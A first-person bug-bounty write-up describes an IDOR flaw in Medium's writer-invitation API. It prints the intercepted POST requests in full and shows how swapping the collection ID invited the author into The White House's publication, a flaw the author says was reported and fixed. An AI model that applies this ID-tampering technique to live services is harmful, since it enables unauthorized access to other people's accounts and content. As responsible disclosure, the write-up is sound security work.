How I invited myself as a Writer of The White House’s Medium Publication

Image from http://www.wellesley.edu

While I was riding home with an Uber, I received an email from Medium about its 5 new features. One of those is the Invite Writers feature.

Email from Medium

They’ve got new features so there’s a possibility that there’s a security issues. Then, I started testing the new feature by inviting my second email in my own publication to test how does the feature works. While doing the inviting process, I opened a tool and intercepted the HTTP POST Request then I got this:

POST /_/api/collections/62fcbc0a9209/invited-authors HTTP/1.1Host: medium.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brX-Obvious-CID: webX-XSRF-Token: NDZnMsyhRddws0sVX-Client-Date: 1479216955226Content-Type: application/jsonReferer: https://medium.com/secuna/editContent-Length: 41Cookie: {Redacted}Connection: close

{“email”:”[email protected]”}

Look at the top line of the code and find the value after /collections/.

62fcbc0a9209 is the Collection ID of Secuna and it quickly reminds me that this kind of request is possibly vulnerable to Insecure Direct Object Reference or also known as IDOR. So, without hesitation I searched for The White House’s Medium Publication and grabbed its Collection ID.

The White House’s Collection ID: 51210352003f

After grabbing the Collection ID of The White House, I modified the HTTP Post Request and change the Collection ID from my publication’s collection ID to The White House’s Collection ID.

POST /_/api/collections/51210352003f/invited-authors HTTP/1.1Host: medium.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brX-Obvious-CID: webX-XSRF-Token: NDZnMsyhRddws0sVX-Client-Date: 1479216955226Content-Type: application/jsonReferer: https://medium.com/secuna/editContent-Length: 41Cookie: {Redacted}Connection: close

{“email”:”[email protected]”}

Then I submitted the HTTP POST Request above and I got a 200 OK HTTP Response which means, I successfully invited myself as a Writer for The White House’s Medium Publication.

After 3 seconds, I got an email from medium with an invitation link.

Invitation Link from The White House

And Wee!

After I found the severe security issue, I immediately reported it to Medium’s Security Team. And In just 9 hours, they fixed it and rewarded me with a $250 bounty.

I’m happy yet too sad at the same time because they removed me from The White House’s Medium Publication.(haha)

Seriously, I am so happy because I helped Medium again making their platform more secure by finding and reporting security vulnerabilities. I’m also the one who found a bug that allows to Update and Delete any Story on Medium.